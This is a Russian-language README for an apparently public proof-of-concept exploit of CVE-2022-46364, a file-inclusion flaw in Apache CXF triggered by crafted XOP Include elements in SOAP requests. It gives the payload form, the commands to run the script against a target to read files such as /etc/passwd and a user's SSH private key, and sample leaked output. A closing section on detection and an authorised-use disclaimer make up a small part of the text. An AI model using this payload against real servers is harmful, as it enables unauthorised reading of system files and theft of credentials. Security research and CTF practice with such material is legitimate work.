
Доказательство концепции эксплуатации для CVE-2022-46364 — уязвимости локального включения файлов в Apache CXF через специально сформированные элементы XOP Include в SOAP-запросах, позволяющей произвольное чтение файлов.
Этот репозиторий содержит эксплойт Proof-of-Concept (PoC) для CVE-2022-46364 — уязвимости Local File Inclusion (LFI) в Apache CXF.
Уязвимость возникает из-за некорректной обработки элементов XOP (XML-binary Optimized Packaging) Include в SOAP-запросах, что позволяет злоумышленникам читать произвольные файлы на сервере.
Apache CXF некорректно обрабатывает элементы <xop:Include> внутри SOAP-запросов. Предоставляя поддельный href (например, file:///etc/passwd), сервер может включить и вернуть содержимое локальных файлов.
Всегда проверяйте точную уязвимую версию в вашей целевой среде.
<xop:Include href="file:///path/to/file">.
├── cxf_lfi.sh # Exploit script
├── README.md # Documentation
├── LICENSE # MIT License
└── .gitignore
chmod +x cxf_lfi.sh
Обновите цель внутри скрипта:
TARGET="http://<TARGET_IP>:8080/employeeservice"
./cxf_lfi.sh file:///etc/passwd
./cxf_lfi.sh file:///etc/passwd
./cxf_lfi.sh file:///home/user/.ssh/id_rsa
[+] Target: http://10.10.10.10:8080/employeeservice
[+] File: file:///etc/passwd
[+] Extracted Content:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
Некоторые серверы могут:
file://Разбор вывода зависит от формата ответа и может потребовать ручной проверки.
Отслеживайте необычные SOAP-запросы, содержащие:
<xop:Include>file:// URIsЭтот проект предназначен для:
Не используйте этот инструмент в системах без явного разрешения.
Разработано в рамках исследования безопасности и практики CTF.